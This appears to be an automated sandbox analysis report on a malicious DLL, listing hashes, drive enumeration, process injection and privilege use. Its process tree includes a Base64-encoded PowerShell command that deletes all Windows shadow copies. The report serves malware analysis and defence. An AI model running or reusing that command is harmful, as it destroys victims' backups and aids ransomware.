Analysis
- max time kernel: 120s
- max time network: 120s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 24-01-2022 00:58
Static task: static1
Behavioral task: behavioral1
- Sample: d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll
- Resource: win10-en-20211208
General
- Target: d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll
- Size: 166KB
- MD5: 46a10b1e1fe68e124c86ee237751fd44
- SHA1: 78f29761f7f0f57a8f92e5f23d9e4d2d6465e848
- SHA256: d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff
- SHA512: c0fbd92fcb136fd5376efba041d4170eccd8bae219812ef00dfc7edfe26f06b651153bdfa2b01d648ebbbc6901c3205790c26a037f85625c0722173d843e633a
Malware Config
Signatures
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: rundll32.exe
  description | ioc | process
  File opened (read-only) by rundll32.exe: \??\P:, \??\U:, \??\W:, \??\Y:, \??\B:, \??\F:, \??\L:, \??\O:, \??\A:, \??\J:, \??\M:, \??\R:, \??\T:, \??\V:, \??\X:, \??\G:, \??\I:, \??\K:, \??\Q:, \??\S:, \??\Z:, \??\E:, \??\H:, \??\N:
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: rundll32.exe, powershell.exe
  pid | process
  948 | rundll32.exe
  1376 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: rundll32.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 948 | rundll32.exe
  Token: SeDebugPrivilege | 1376 | powershell.exe
  Token: SeBackupPrivilege | 832 | vssvc.exe
  Token: SeRestorePrivilege | 832 | vssvc.exe
  Token: SeAuditPrivilege | 832 | vssvc.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  Processes: rundll32.exe, rundll32.exe
  description | pid | process | target process
  PID 1612 wrote to memory of 948 | 1612 | rundll32.exe | rundll32.exe (7 occurrences)
  PID 948 wrote to memory of 1376 | 948 | rundll32.exe | powershell.exe (4 occurrences)
Processes
- C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll,#1
  PID: 1612
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll,#1
    PID: 948
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      PID: 1376
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 788
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 832
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- memory/948-55-0x0000000075F81000-0x0000000075F83000-memory.dmp (Filesize: 8KB)
- memory/1376-56-0x000007FEFBCB1000-0x000007FEFBCB3000-memory.dmp (Filesize: 8KB)
- memory/1376-57-0x000007FEF2D80000-0x000007FEF38DD000-memory.dmp (Filesize: 11.4MB)
- memory/1376-59-0x0000000002420000-0x0000000002422000-memory.dmp (Filesize: 8KB)
- memory/1376-61-0x0000000002424000-0x0000000002427000-memory.dmp (Filesize: 12KB)
- memory/1376-60-0x0000000002422000-0x0000000002424000-memory.dmp (Filesize: 8KB)
- memory/1376-58-0x000000001B830000-0x000000001BB2F000-memory.dmp (Filesize: 3.0MB)
- memory/1376-62-0x000000000242B000-0x000000000244A000-memory.dmp (Filesize: 124KB)